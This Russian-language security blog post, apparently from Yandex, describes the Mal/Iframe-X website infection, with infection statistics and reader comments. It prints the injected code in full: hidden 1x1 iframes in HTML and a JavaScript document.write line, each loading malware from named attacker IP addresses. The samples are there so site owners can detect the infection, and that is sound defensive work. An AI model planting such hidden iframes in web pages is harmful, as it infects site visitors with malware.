Блог о безопасности

Вредоносный фрейм Mal/Iframe-X

7 октября 2011, 13:20

В последнее время наша система существенно чаще, чем обычно, находит сайты с вредоносным кодом, который относится к Mal/Iframe-X по классификации компании Sophos. Динамика числа уникальных хостов, заражённых данным вредоносным кодом, выглядит так:



Признаком заражения страницы Mal/Iframe-X является обнаружение в DOM тега IFRAME, в который загружается браузерный вредоносный код. Примерно в 75% случаев это происходит при прописывании этого тега непосредственно в HTML-коде страницы, в оставшихся 25% – при выполнении в контексте браузера специального JavaScript-файла, который дописывает тег в код страницы.


  • Пример вредоносного кода в HTML-страницах:

    <iframe frameborder=0 src="http://64.247.185.149/Home/index.php" width=1 height=1 scrolling=no>
  • Пример вредоносного кода в JavaScript-файлах:

    document.write('<iframe frameborder=0 src="http://65.75.160.235/Home/index.php" width=1 height=1 scrolling=no>)
  • В атрибуте SRC вредоносного IFRAME практически всегда содержится URL вида:

    http://IP_ADDRESS/Home/index.php
    где IP_ADDRESS - это IP-адрес сервера злоумышленников, с которого подгружается основная часть  вредоносного кода.


Как видно из графика ниже, особой популярностью у злоумышленников, распространяющих  код Mal/Iframe-X, пользуются сайты в доменной зоне COM. Доли доменных зон выглядят следующим образом:



Для распространения основной части вредоносного кода злоумышленники используют серверы с различными IP-адресами, но примерно в четверти случаев это IP-адрес 64.247.185.149&. Доли серверов злоумышленников, которые участвуют в заражении, выглядят следующим образом:



Упрощённая схема работы Mal/Iframe-X выглядит так:




Рекомендации

Рекомендуем вам проверить, нет ли на страницах ваших сайтов подобного вредоносного кода. Если вы не знаете, является ли ваш сайт источником распространения вредоносного кода, или о сайте известно, что он заражён, но непонятно, что это за вредоносный код и как от него избавиться – вы можете зарегистрироваться на сервисе Яндекс.Вебмастер, с помощью которого можно посмотреть детальную информацию о заражении, рекомендации по его лечению, а также запустить внеочередную перепроверку сайта.

Дополнительная информация о том, как обезопасить сайт и компьютер в интернете, содержится в статьях:
17 комментариев
Подписаться на комментарии к посту

Через вообще всякая пакость часто лезет :( Проще отключить их ...

В первую очередь отключайте javascript, что уж там.

А я и так отключаю кое-какие скрипты :) И если бы я этого не делал, то ежедневно удалял бы какие-нибудь WinLocker'ы и другую пакость не говоря уже про опасность хищения паролей. По той же причине приходится запрещать Flash до особого разрешения.

По поводу . Это действительно очень распространенный прием внедрения вредоносного кода и обидно, что Яндекс им начал пользоваться, - зачем Яндекс прячет часть кода под этим тегом?

И это не паранойя. Большинство противников контрацепции завершают свою жизнь в таком вот виде ( ;-( ):

Вообще, я так понимаю, что iframe удобен тем, что так можно отсылать запросы, минуя политику безопасности, разрешающую отсылать их только к себе на домен. Но есть техники, которые позволяют это и без iframe, просто iframe удобнее. И сам по себе тег iframe технически вполне оправдан и бывает крайне удобен для встраивания чужих решений. То, что можно использовать для плохих вещей не ставит его вне закона, браузер вообще штука опасная, что его теперь запретить?

btw, с отключённым js вам этот iframe не страшен, а flash вообще в народе кличут решетом за доблестные успехи в безопасности.

ну и линукс ещё можно использовать, очень удобно, да. :) правда, если без фанатизма.

Знаю, что удобен - сам иногда пользуюсь, но и скрипты в нем е размещаю и 1х1 размер не делаю.

Кроме js есть и php и perl и ... Но дело даже не в этом. Я же не отключаю все скрипты - ничего работать не будет (хотя во ногих случаях применение скриптов, с моей точки зрения, не оправдано - можно и без них обойтись). Сейчас какое-то поветрие использовать скрипты. Яндекс разбросал свои скрипты по такому количеству доменов, что я удивляюсь, как он сам не запутался где и что лежит :)

Майл вовсе стремиться, чтобы ему ВСЕ разрешали иначе отказывается рабоать. Google хранит скрипты для защищенных страниц на незащищенных доменах. etc.

btw, Линкус тоже использую ;)

>Кроме js есть и php и perl и

Вы сравниваете зелёное и мягкое.

Да знаю я. Просто предпочитаю, чтобы тег использовался по назначению. Что там такое, чтобы скрывать? Просто скрывать можно используя "display:none".

Ладно. Будем считать, что у меня паранойя развилась наконец :)

можно просто заблокировать представленные ИП адреса либо в фаерволе либо в плагине для браузера

 

 

 

 

 

--

http://www.shredder05.ru

Ой,извините! Я чайник, а Вы такой продвинутый! Подскажите, пожалуйста, В нижеприведённом коде какая-то дрянь? Проверка сайта даёт информацию о наличии вредоносного кода,а где ,не понятно. Но последние пару дней понесся спам от фейсбука! Я поискала и нашла вот это---------------
* FACEBOOK LIKE BUTTON
* --------------------------------------------------------------------------------------------------------------------------------
*/
function ess_facebook_like(){
if(ess_activation_checker("ess_facebooklike_active")):

// Get the current link, encode it
$share_link = urlencode(get_permalink());

echo '

. $share_link . '&layout=standard&;show_faces=true&width=450&action=like&;font&colorscheme=light&height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:450px; height:25px; margin:15px 0 0 0;" allowTransparency="true">

';
endif;
}... может это и есть ОН ? А то я не понимаю! Спасибо, и не будьте строги, знакомлюсь с интернетом методом тыка! Спасибо!

Кошмар, он что, и сдесь живой! А как егоотключить?

В моем случаи на движке shopos код подгружают прямо в кэш сайта, это очень напрягает. 

Да. У меня пострадали сайты недавно. Но не от этого вируса.

Теперь добавил все важные сайты в панель вебмастера.

А как "запустить внеочередную перепроверку сайта"? никто не в курсе?

добавлю в чёрный список и HandyCache и антивируса.

Извините, а как здесь задавать вопросы? Не поняла.

ссылка этого раздела на страничке - 

- НЕрабочая, указывается ошибка при клике